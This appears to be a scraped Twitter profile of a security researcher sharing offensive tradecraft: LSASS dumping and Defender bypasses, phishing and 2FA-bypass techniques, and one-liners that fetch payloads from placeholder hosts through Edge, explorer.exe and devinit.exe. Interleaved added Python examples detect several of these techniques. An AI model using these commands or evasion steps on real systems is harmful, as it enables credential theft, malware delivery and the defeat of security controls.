mr.d0x Profile
mr.d0x

@mrd0x

Followers
40,304
Following
247
Media
45
Statuses
1,082

Security researcher | Co-founder

Joined November 2020
Pinned Tweet
@mrd0x
mr.d0x
1 year
MalDev Academy is ready! Website: MaldevAcademy[.]com Launch date: April 16th, 2023 - 32 Beginner modules - 49 Intermediate modules - 10 Advanced modules - 20 in the works for updates in the next few months - 65 Custom code samples Very fair pricing, starting at $249 @NUL0x4C
52
204
851
@mrd0x
mr.d0x
2 years
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my Github feel free to test them out.
Tweet media one
118
1K
4K
@mrd0x
mr.d0x
2 years
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
Tweet media one
49
1K
3K
@mrd0x
mr.d0x
2 years
Bypass Defender AV static detection: If you name a malicious file DumpStack.log Defender doesn't scan it.
Tweet media one
44
1K
3K
@mrd0x
mr.d0x
2 years
I'll be dropping a new phishing technique for stealing credentials & bypassing 2FA today. You do not want to miss this.
41
401
2K
@mrd0x
mr.d0x
2 years
Steal Credentials & Bypass 2FA Using noVNC
Tweet media one
55
681
2K
@mrd0x
mr.d0x
2 years
Here I bypassed Defender AV by making: .eyb files as .exe .faq files as .dll I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
Tweet media one
29
517
2K
@mrd0x
mr.d0x
2 years
Chromium's application mode can be used to easily build realistic phishing desktop applications. Enjoy.
Tweet media one
28
472
1K
@mrd0x
mr.d0x
11 months
Reminder that creating a memory dump of Outlook.exe not only produces access tokens but also potentially sensitive email content.
Tweet media one
Tweet media two
20
260
1K
@mrd0x
mr.d0x
2 years
LOLBIN to dump LSASS: Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions Binary: DumpMinitool.exe The params are case sensitive.
Tweet media one
Tweet media two
Tweet media three
16
313
950
@mrd0x
mr.d0x
2 years
Another way to download files using msedge/chrome: [msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom "http://server/evil.b64.html" > out.b64 - Downloaded file should end with .html. - Binaries should be encoded.
Tweet media one
5
353
914
@mrd0x
mr.d0x
3 years
Today I've launched . I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
26
364
908
@mrd0x
mr.d0x
2 years
Living Off Trusted Sites: Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
33
352
874
@mrd0x
mr.d0x
2 years
Stealing Access Tokens From Office Desktop Applications
9
277
828
@mrd0x
mr.d0x
2 years
It seems that you can still completely bypass Defender AV's static detection using *.log files, only now you have to use DLLs instead of EXEs.
Tweet media one
Tweet media two
Tweet media three
11
266
793
@mrd0x
mr.d0x
2 years
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won't scan the link anymore. <a href="phishing link">click</a> ==> junk <a href="" href="phishing link">click</a> ==> inbox
Tweet media one
Tweet media two
11
246
766
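The tweet above describes a scanner that stops at the first href it sees. The following is an added example, not code from the tweet or its author: it puts a first-match regex scanner next to a parser that keeps every href on an anchor, so the duplicated-attribute form is reported instead of silently reduced to an empty link. The HTML samples and the domain phish.example are constructed.

```python
"""Added example: a first-match link scanner versus one that keeps every href.

Not code from the tweet; the sample HTML and the domain phish.example are constructed.
"""
import re
from html.parser import HTMLParser

# Constructed samples: a plain anchor and the duplicated-href form described in the tweet
NORMAL = '<p><a href="https://phish.example/login">click</a></p>'
DUPLICATED = '<p><a href="" href="https://phish.example/login">click</a></p>'

ANCHOR_TAG_RE = re.compile(r"<a\b[^>]*>", re.I)
HREF_RE = re.compile(r'href\s*=\s*"([^"]*)"', re.I)


def naive_links(html):
    """Scanner that takes the first href on each <a>: sees "" for the duplicated form."""
    links = []
    for tag in ANCHOR_TAG_RE.finditer(html):
        m = HREF_RE.search(tag.group(0))
        links.append(m.group(1) if m else "")
    return links


class _AnchorCollector(HTMLParser):
    """html.parser hands attributes over as a list of (name, value) pairs, duplicates included."""

    def __init__(self):
        super().__init__()
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.anchors.append(attrs)


def all_hrefs(html):
    """Every href on each <a>, plus a flag when the attribute is repeated."""
    parser = _AnchorCollector()
    parser.feed(html)
    parser.close()
    results = []
    for attrs in parser.anchors:
        hrefs = [value or "" for name, value in attrs if name == "href"]
        results.append({"hrefs": hrefs, "duplicate_href": len(hrefs) > 1})
    return results


if __name__ == "__main__":
    print(naive_links(DUPLICATED))  # ['']
    print(all_hrefs(DUPLICATED))    # [{'hrefs': ['', 'https://phish.example/login'], 'duplicate_href': True}]
```

A repeated href on one tag has no legitimate use in mail, so the duplicate_href flag alone is a reasonable reason to hold a message, independent of which value a given renderer ends up honouring.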
@mrd0x
mr.d0x
1 year
For the past couple of months @NUL0x4C and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
Tweet media one
37
163
767
@mrd0x
mr.d0x
2 years
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com 1. Insert a file attachment on a OneNote Notebook 2. Double click the inserted attachment and grab the direct download link. Added to
Tweet media one
Tweet media two
7
228
703
@mrd0x
mr.d0x
2 years
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from gmail/o365 or chats from Whatsapp and exfiltrate & download files. ENJOY.
8
274
658
@mrd0x
mr.d0x
2 years
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
13
175
626
@mrd0x
mr.d0x
2 years
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure. msedge.exe --app="http://example[.]com/index.html" --kiosk
Tweet media one
8
130
605
@mrd0x
mr.d0x
2 years
Outlook attachments can be directly downloaded. 1. Compose an email 2. Attach a file (add .txt to the end if it's a restricted file type) 3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net) Link is valid for ~15 minutes.
Tweet media one
16
212
606
@mrd0x
mr.d0x
2 years
Here it is:
21
166
599
@mrd0x
mr.d0x
2 years
Reminder to not trust calendar (.ics) attendees.
Tweet media one
11
161
601
@mrd0x
mr.d0x
2 years
LOLBIN(s): mpiexec.exe & smpd.exe Path: C:\Program Files\Microsoft MPI\Bin mpiexec.exe spawns smpd.exe which then spawns an executable. Usage: mpiexec.exe -n 1 c:\path\to\binary.exe (1/2)
Tweet media one
Tweet media two
Tweet media three
2
227
579
@mrd0x
mr.d0x
2 years
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download. Default browser: explorer.exe https://server/file.exe.txt Edge: explorer.exe microsoft-edge: https://server/file.exe.txt
5
161
503
@mrd0x
mr.d0x
2 years
Abusing Google Drive's Email File Functionality for phishing. Enjoy!
5
191
491
@mrd0x
mr.d0x
2 years
Anyone else aware that .asd files can contain macros? Literally just found out. Added to Filesec:
Tweet media one
7
145
452
@mrd0x
mr.d0x
2 years
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen. In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!
14
163
419
@mrd0x
mr.d0x
2 years
Demo: Injecting a JS keylogger using WebView2 into login[.]microsoftonline[.]com. Better quality: Blog post:
10
143
393
@mrd0x
mr.d0x
1 year
Didn't have time to talk about the newly released TLDs last week, but here we go. File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing
11
147
384
@mrd0x
mr.d0x
2 years
Phishing O365 Users With Spoofed Cloud Attachments
3
156
369
@mrd0x
mr.d0x
2 years
Procdump dump lsass Defender: Threat detected! Sqldumper dump lsass Defender: Sure, go right ahead! btw dumping lsass with sqldumper.exe is not new, actually it's quite old.
Tweet media one
Tweet media two
5
98
362
@mrd0x
mr.d0x
2 years
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly. I tested msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it. devinit.exe run -t msi-install -i http://10.0.0.18/out.msi
Tweet media one
4
116
354
@mrd0x
mr.d0x
2 years
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe Execute a local binary or one from a file share. Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
Tweet media one
Tweet media two
Tweet media three
2
118
335
@mrd0x
mr.d0x
2 years
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed. I've seen other security solutions that do this, try to copy the file quickly before it's removed.
Tweet media one
Tweet media two
8
89
286
@mrd0x
mr.d0x
2 years
I've created a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
0
117
277
@mrd0x
mr.d0x
2 years
Attempting to access protection history after detecting a malicious file with a really long name + path crashes Defender's UI lol.
7
45
263
@mrd0x
mr.d0x
2 months
How much awareness is there around Context Menu Spoofing/Hijacking for persistence? Here's hijacking SentinelOne's "Scan for threats" to run a command.
6
70
240
@mrd0x
mr.d0x
3 years
You can spoof almost everything in a Calendar invite by customizing an .ics file. I think this can definitely trick many users.
2
88
226
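Both calendar tweets above (the reminder not to trust .ics attendees, and this one on spoofing the invite) come down to the same fact: ORGANIZER and ATTENDEE lines are attacker-written text, and the CN display name need not have anything to do with the mailto: address. The following is an added example, not code from the tweets or their author: it unfolds an .ics file per RFC 5545, parses those properties with their parameters, and flags a CN that is itself an e-mail address but differs from the mailto target. The invite and the domains corp.example / phish.example are constructed.

```python
"""Added example: read ORGANIZER/ATTENDEE lines from an .ics file and flag display names
that claim a different address than the mailto value. Not code from the tweets; the invite
below is constructed (domains corp.example / phish.example)."""
import re

# Constructed invite: the organizer's display name claims to be the CEO, the mailto is not
SAMPLE_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//constructed sample//EN",
    "BEGIN:VEVENT",
    "UID:constructed-1@corp.example",
    "SUMMARY:Q3 planning",
    "ORGANIZER;CN=ceo@corp.example:mailto:attacker@phish.example",
    "ATTENDEE;CN=Alice Admin;ROLE=REQ-PARTICIPANT;RSVP=TRUE:mailto:alice@corp.exa",
    " mple",  # folded continuation line
    'ATTENDEE;CN="Bob, Bob":mailto:bob@corp.example',
    "END:VEVENT",
    "END:VCALENDAR",
])

EMAIL_RE = re.compile(r"[^\s@<>\"]+@[^\s@<>\"]+")


def unfold(text):
    """RFC 5545 3.1: a line starting with one space or tab continues the previous line."""
    lines = []
    for line in text.replace("\r\n", "\n").split("\n"):
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += line[1:]
        elif line:
            lines.append(line)
    return lines


def split_outside_quotes(s, sep):
    """Split on sep, ignoring separators inside double-quoted parameter values."""
    parts, buf, quoted = [], [], False
    for ch in s:
        if ch == '"':
            quoted = not quoted
        if ch == sep and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return parts


def parse_property(line):
    """NAME;PARAM=value;PARAM="quoted value":VALUE -> (NAME, {PARAM: value}, VALUE)."""
    pieces = split_outside_quotes(line, ":")
    if len(pieces) < 2:
        return None
    head, value = pieces[0], ":".join(pieces[1:])  # the value itself may contain ':' (mailto:)
    name, *raw_params = split_outside_quotes(head, ";")
    params = {}
    for p in raw_params:
        k, _, v = p.partition("=")
        params[k.upper()] = v.strip('"')
    return name.upper(), params, value


def check_participants(ics_text):
    """One record per ORGANIZER/ATTENDEE with an 'issue' when CN and mailto disagree."""
    findings = []
    for line in unfold(ics_text):
        prop = parse_property(line)
        if not prop or prop[0] not in ("ORGANIZER", "ATTENDEE"):
            continue
        name, params, value = prop
        address = value[7:].lower() if value.lower().startswith("mailto:") else value.lower()
        cn = params.get("CN", "")
        claimed = EMAIL_RE.search(cn)
        issue = None
        if claimed and claimed.group(0).lower() != address:
            issue = "CN is an address that differs from the mailto target"
        findings.append({"role": name, "cn": cn, "address": address, "issue": issue})
    return findings
```

Run on a real invite, the address field is what the mail client will actually reply to; the cn field is what the user sees. Anything that matters for trust decisions should be keyed on the former.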
@mrd0x
mr.d0x
2 years
You should probably be aware of this technique. Custom Previews For Malicious Attachments.
3
89
212
@mrd0x
mr.d0x
2 years
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge. start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F Modify file extension back to original after download.
5
74
210
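Three tweets on this page use a browser as the download primitive: explorer.exe handing a URL to the default browser or to Edge, msedge/chrome with --headless --dump-dom, and the minimized-Edge one-liner above, each with an executable extension parked behind a harmless one. The following is an added example, not code from the tweets or their author: it runs over constructed process-creation command lines and reports a browser fetch whose filename hides an executable extension before the final one, or a headless --dump-dom invocation. The host name 'server' is taken from the tweets; everything else is constructed.

```python
"""Added example: flag browser command lines that fetch a file whose executable extension is
hidden behind a harmless one, or that use headless --dump-dom as a download primitive.
Not code from the tweets; the command lines below are constructed."""
import re
from urllib.parse import urlparse

EXEC_EXTS = {"exe", "dll", "msi", "ps1", "bat", "cmd", "vbs", "js", "hta", "scr", "com"}
BROWSER_IMAGES = ("msedge.exe", "chrome.exe", "explorer.exe")
URL_RE = re.compile(r"(?:microsoft-edge:)?https?://[^\s\"']+", re.I)

# Constructed process-creation command lines
SAMPLES = [
    r"explorer.exe https://server/file.exe.txt",
    r"explorer.exe microsoft-edge:https://server/file.exe.txt",
    r'start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F',
    r'msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://server/evil.b64.html"',
    r"msedge.exe https://docs.example/readme.txt",
]


def hidden_executable_extensions(url):
    """Executable extensions before the last one: ['exe'] for file.exe.txt, [] for readme.txt."""
    filename = urlparse(url).path.rsplit("/", 1)[-1]
    parts = filename.lower().split(".")
    return [p for p in parts[1:-1] if p in EXEC_EXTS]


def analyze(cmdline):
    """None for non-browser command lines; otherwise the URLs seen and why they look suspicious."""
    low = cmdline.lower()
    browser = next((b for b in BROWSER_IMAGES if b in low), None)
    if browser is None:
        return None
    urls = []
    for raw in URL_RE.findall(cmdline):
        # explorer.exe microsoft-edge:<url> hands the URL to Edge; strip the protocol handler
        urls.append(raw[len("microsoft-edge:"):] if raw.lower().startswith("microsoft-edge:") else raw)
    reasons = []
    for url in urls:
        hidden = hidden_executable_extensions(url)
        if hidden:
            final = url.rsplit(".", 1)[-1]
            reasons.append(f"{url}: .{'/.'.join(hidden)} hidden behind .{final}")
    if "--headless" in low and "--dump-dom" in low:
        reasons.append("headless --dump-dom fetch: page body written to stdout")
    return {"browser": browser, "urls": urls, "reasons": reasons, "suspicious": bool(reasons)}


def triage(cmdlines):
    return [r for r in (analyze(c) for c in cmdlines) if r and r["suspicious"]]
```

The extension list is a starting point, not a whitelist of safe ones: the tweets' own point is that the appended extension is removed after download, so the interesting signal is the extension before the last dot, not the last dot itself.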
@mrd0x
mr.d0x
2 years
I mentioned a few days ago that there's two LOLBIN binaries that do DLL injection. After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
Tweet media one
Tweet media two
2
76
204
@mrd0x
mr.d0x
2 years
updated. Thanks to all the contributors.
6
52
199
@mrd0x
mr.d0x
11 months
Interesting initial access techniques dropping tomorrow at @MalDevAcademy
5
31
196
@mrd0x
mr.d0x
11 months
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔
Tweet media one
3
46
195
@mrd0x
mr.d0x
2 years
Tampering with ForcePoint DLP Write up on CVE-2022-27608 & CVE-2022-27609
5
48
154
@mrd0x
mr.d0x
11 months
I'll be dropping two variations of a new initial access technique exclusively for @MalDevAcademy premium & lifetime users (in update 2 or update 3). Red teamers you'll be very happy. Blue teamers you'll want to have safeguards in place for this.
3
23
154
@mrd0x
mr.d0x
2 years
I actually didn't know about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
Tweet media one
Tweet media two
3
36
145
@mrd0x
mr.d0x
2 years
16 new entries added to Thanks for the contributions.
4
39
146
@mrd0x
mr.d0x
11 months
All security solution vulns I previously found were too easily exploitable. In the newly posted Exploiting EDRs For Evasion module in @MalDevAcademy I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
5
21
134
@mrd0x
mr.d0x
2 years
Or just fake the entire Desktop using HTML/CSS/JS. LOL. Win10css:
Tweet media one
4
9
122
@mrd0x
mr.d0x
2 years
I guess this is their way of whitelisting their dump64.exe tool that comes with Microsoft Visual Studio.
1
10
119
@mrd0x
mr.d0x
5 months
Havoc made the cut @C5pider 🎉
@kalilinux
Kali Linux
5 months
Before we wrap up the year, it’s time to get out one last Kali release for 2023. Announcing Kali 2023.4! for a focus on the addition of Hyper-V support to Vagrant, ARM64 Cloud images, support for the Pi 5, and an update to Gnome 45. Check it out!
Tweet media one
29
336
2K
1
3
122
@mrd0x
mr.d0x
2 years
20 new websites added to An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds: @BushidoToken
7
31
117
@mrd0x
mr.d0x
2 years
@chvancooten And if you want to bypass that big splash screen, you can :)
3
34
113
@mrd0x
mr.d0x
2 years
Outlook link preview spoofing. Either modify the HTML while sending it or insert a different link when it tries to fetch a preview of the site.
Tweet media one
1
7
107
@mrd0x
mr.d0x
2 years
LOTS Project updated: 15 new entries.
2
36
106
@mrd0x
mr.d0x
2 years
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
Tweet media one
4
5
99
@mrd0x
mr.d0x
2 years
Just added a new batch of sites to . Thanks to all the contributors. Will continue to add more.
2
21
98
@mrd0x
mr.d0x
2 years
For example, to make .eyb act as a .exe go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb and modify it as shown in the image. (2/2)
Tweet media one
4
15
94
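The two-part thread above makes an arbitrary extension behave as an .exe or .dll by editing its key under HKLM\SOFTWARE\Classes. The following is an added example, not code from the tweets or their author: the tweet only says the .eyb key was modified "as shown in the image"; pointing the extension's default value at the exefile (or dllfile) ProgID is one way to get that effect, and that mapping is what this check looks for in a .reg export. The export below is constructed; the ProgID-to-extension table lists the handlers Windows registers by default.

```python
"""Added example: find file-extension keys under Classes whose default ProgID is an executable
handler registered for a different extension. Not code from the tweets; the .reg export below
is constructed, and the exefile mapping is one assumed way of producing the tweet's effect."""

# Default ProgIDs Windows registers for executable and script extensions (lowercased for lookup)
EXEC_PROGIDS = {
    "exefile": ".exe", "dllfile": ".dll", "comfile": ".com", "batfile": ".bat",
    "cmdfile": ".cmd", "vbsfile": ".vbs", "jsfile": ".js", "wsffile": ".wsf",
    "htafile": ".hta", "scrfile": ".scr", "microsoft.powershellscript.1": ".ps1",
}

# Constructed export: two hijacked extensions, one legitimate executable key, one text key
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb]
@="exefile"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.faq]
@="dllfile"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe]
@="exefile"
"Content Type"="application/x-msdownload"

[HKEY_CURRENT_USER\Software\Classes\.txt]
@="txtfile"
"""


def parse_reg(text):
    """Minimal .reg reader for string values: {key path: {value name: value}}, '@' is the default."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = value.strip('"')
    return keys


def find_extension_hijacks(reg_text):
    """Extension keys whose default ProgID belongs to a different executable extension."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        parts = key.split("\\")
        ext = parts[-1].lower()
        parent = parts[-2].lower() if len(parts) > 1 else ""
        # HKLM\...\Classes\.ext, HKCU\...\Classes\.ext and HKEY_CLASSES_ROOT\.ext all count
        if not ext.startswith(".") or parent not in ("classes", "hkey_classes_root"):
            continue
        progid = values.get("@", "")
        canonical = EXEC_PROGIDS.get(progid.lower())
        if canonical and canonical != ext:
            findings.append({"key": key, "extension": ext, "progid": progid, "acts_as": canonical})
    return findings
```

The same walk works against a live hive exported with `reg export HKLM\SOFTWARE\Classes classes.reg`; per-user hijacks live under HKCU\Software\Classes and need no admin rights, so export both.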
@mrd0x
mr.d0x
2 years
LOTS Project updated with 16 new entries. Thanks to all contributors.
0
25
94
@mrd0x
mr.d0x
10 months
Throwback:
@_zblurx
Thomas Seigneuret
10 months
Want to bypass Windows Defender when dumping LSASS ? Just dump into .log files😅
Tweet media one
26
325
1K
3
12
92
@mrd0x
mr.d0x
11 months
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!
2
6
86
@mrd0x
mr.d0x
1 year
Hope you all enjoy it.
@MalDevAcademy
MalDev Academy
1 year
MaldevAcademy[.]com is now live!
16
48
207
4
12
82
@mrd0x
mr.d0x
3 years
Hide your phishing link behind Google's domain. Thanks Google you're always adding some great "features".
0
37
81
@mrd0x
mr.d0x
2 years
Please make sure you're aware that this technique is not necessarily VNC specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer etc). But I felt noVNC provided the most seamless experience to target users.
@mrd0x
mr.d0x
2 years
Steal Credentials & Bypass 2FA Using noVNC
Tweet media one
55
681
2K
1
15
79
@mrd0x
mr.d0x
2 years
Another 30 APIs added to since yesterday. Thanks for all your support. Please continue submitting APIs I'll add them as soon as possible.
0
17
74
@mrd0x
mr.d0x
2 years
t[.]m1[.]email[.]samsung[.]com is being used to redirect users to phishing websites. Reference:
1
20
72
@mrd0x
mr.d0x
2 years
Finally had some time to push new APIs on . Sorry for the delay and thanks to all contributors.
1
14
72
@mrd0x
mr.d0x
2 years
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit. I also updated it to add a few more techniques.
2
19
72
@mrd0x
mr.d0x
2 years
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service. 1. sc qc <service> ==> check dependencies 2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
0
14
66
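The tweet above is a two-step manual procedure: `sc qc <service>` to read the dependency list, then `sc qc <dependency>` on each one to find a link that can be stopped or reconfigured. The following is an added example, not code from the tweet or its author: it parses the DEPENDENCIES block out of `sc qc` output, walks the chain transitively, and lists the services in it that a vendor does not tamper-protect. The service names, the outputs and the protected set are constructed; real `sc qc` output has the same layout, with the first dependency on the field line and any others on following lines that start with a colon.

```python
"""Added example: read the DEPENDENCIES block from `sc qc` output, walk it transitively and
list the services in the chain that are not tamper-protected. Not code from the tweet; the
services, outputs and protected set below are constructed."""

# Constructed `sc qc` outputs keyed by service name; unknown services return ""
SC_QC = {
    "VendorAgent": r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VendorAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Vendor\agent.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Vendor Endpoint Agent
        DEPENDENCIES       : VendorFilter
                           : VendorHelper
        SERVICE_START_NAME : LocalSystem
""",
    "VendorFilter": r"""SERVICE_NAME: VendorFilter
        TYPE               : 2   FILE_SYSTEM_DRIVER
        DEPENDENCIES       :
        SERVICE_START_NAME :
""",
    "VendorHelper": r"""SERVICE_NAME: VendorHelper
        TYPE               : 10  WIN32_OWN_PROCESS
        DEPENDENCIES       : VendorLog
        SERVICE_START_NAME : LocalSystem
""",
    "VendorLog": r"""SERVICE_NAME: VendorLog
        TYPE               : 10  WIN32_OWN_PROCESS
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
""",
}


def parse_dependencies(sc_qc_output):
    """Names under DEPENDENCIES: the first on the field line, the rest on ':'-prefixed lines."""
    deps, in_block = [], False
    for raw in sc_qc_output.splitlines():
        line = raw.strip()
        if line.startswith("DEPENDENCIES"):
            in_block = True
            value = line.split(":", 1)[1].strip()
        elif in_block and line.startswith(":"):
            value = line[1:].strip()
        elif in_block:
            break  # the next field name ends the list
        else:
            continue
        if value:
            deps.append(value)
    return deps


def dependency_closure(service, query):
    """{service: [direct dependencies]} for every service reachable from `service`.

    `query(name)` returns the text of `sc qc name`; on a live host that would be
    subprocess.run(["sc", "qc", name], capture_output=True, text=True).stdout.
    """
    graph, pending = {}, [service]
    while pending:
        name = pending.pop()
        if name in graph:
            continue
        graph[name] = parse_dependencies(query(name))
        pending.extend(graph[name])
    return graph


def unprotected(graph, protected):
    """Services in the chain the vendor does not tamper-protect (the assumed `protected` set):
    stopping or reconfiguring one of these is the weak link the tweet describes."""
    return sorted(name for name in graph if name not in protected)
```

The output is the list to hand back to the vendor or to cover with your own monitoring: a service that is only as available as its least-protected dependency is not tamper-protected in any meaningful sense.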
@mrd0x
mr.d0x
3 months
Why does it feel like we're asking for too much?
@vxunderground
vx-underground
3 months
All we want is a basic web browser with an ad blocker.
66
139
3K
2
3
67
@mrd0x
mr.d0x
2 years
I added macros as a category on . Credits to @Hexacorn for making me realize how many file extensions there are related to macros. I also removed a few other categories that I don't think are as useful as I initially thought they'd be. Enjoy!
2
19
64
@mrd0x
mr.d0x
2 years
@vaisovbek Nope, like this:
1
6
61
@mrd0x
mr.d0x
2 years
I really like 12ft[.]io which is used to bypass paywalls. But be aware that it can also be used to masquerade phishing links. Reference:
0
12
58
@mrd0x
mr.d0x
2 years
Sorry if the images are blurry on the blog post. They are available on the Github Repo in far better resolution:
0
8
61
@mrd0x
mr.d0x
2 years
@Warlockobama That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this: 1. Suspicious 2. Technical glitch 3. Intended "feature" Maybe if we're lucky our odds may just be the latter two.
1
4
60
@mrd0x
mr.d0x
1 year
@n00py1 I mentioned an alternative way of doing this in one of my previous posts. Combine that with BITB and it becomes pretty realistic.
Tweet media one
1
9
55
@mrd0x
mr.d0x
2 years
I think this is a great example of how important it is to be conscious of what you put out there. The smallest things can potentially be used in ways you didn't expect.
@Hexacorn
Adam
2 years
The Anti-VM trick that is kinda... personal #dfir
22
93
360
6
6
50
@mrd0x
mr.d0x
2 years
Turns out args: 0,2,4 are useless and can be literally anything as long as args 1,3,5 are valid. Watch out for this if you're writing detection rules.
@4A616D6573
4A616D6573
2 years
@mrd0x Example that works: ./DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full Output file: 'dump6.txt' Process id: 660 Dump type: Full Dumped process.
Tweet media one
0
1
9
1
12
43
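The thread above (the DumpMinitool LOLBIN, the case-sensitive parameters, and the follow-up that tokens 0, 2 and 4 are ignored as long as 1, 3 and 5 are valid) is a warning to anyone writing a rule that matches on the flag text --file / --processId / --dumpType. The following is an added example, not code from the thread or its author: it parses constructed command lines by argument position, so the output file, PID and dump type are recovered whatever the caller put in the flag slots, and a renamed copy with the same six-argument shape is still reported.

```python
"""Added example: parse DumpMinitool.exe command lines by argument position.

Not code from the thread; the command lines below are constructed. Tokens 0, 2 and 4 are
ignored by the tool, so a rule keyed on the flag text is trivially evaded; tokens 1, 3 and 5
(output file, PID, dump type) carry the meaning.
"""
import re

# Constructed process-creation command lines
SAMPLES = [
    r'"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions'
    r'\TestPlatform\Extensions\DumpMinitool.exe" --file dump.txt --processId 660 --dumpType Full',
    r"DumpMinitool.exe 1 dump6.txt 2 660 3 Full",
    r"C:\Tools\renamed.exe x out.dmp y 660 z Full",
    r"notepad.exe dump.txt",
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split on whitespace, keeping double-quoted spans together, and drop the quotes."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def parse_dumpminitool(cmdline):
    """Output file, PID and dump type if the command line has DumpMinitool's six-argument shape.

    The image name is recorded but not required: a renamed copy is reported with renamed=True.
    Anything without six arguments or without a numeric PID in slot 3 returns None.
    """
    tokens = tokenize(cmdline)
    if len(tokens) < 7:
        return None
    image, args = tokens[0], tokens[1:7]
    outfile, pid, dump_type = args[1], args[3], args[5]
    if not pid.isdigit():
        return None
    image_name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return {
        "image": image_name,
        "renamed": image_name.lower() != "dumpminitool.exe",
        "outfile": outfile,
        "pid": int(pid),
        "dump_type": dump_type,
        "ignored_tokens": (args[0], args[2], args[4]),  # whatever the caller put in the flag slots
    }


def scan(cmdlines):
    return [hit for hit in (parse_dumpminitool(c) for c in cmdlines) if hit]
```

The shape-only match will produce noise on its own; in a real rule pair it with the image's signer or OriginalFileName, and treat a PID that resolves to lsass.exe as the thing worth alerting on.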
@mrd0x
mr.d0x
2 years
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
1
8
44
@mrd0x
mr.d0x
2 years
@techspence I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image. Also note that it's still subject to other methods of detection like behavior, heuristics etc.
Tweet media one
1
2
42
@mrd0x
mr.d0x
2 years
Sometimes it's that simple.
@mrd0x
mr.d0x
2 years
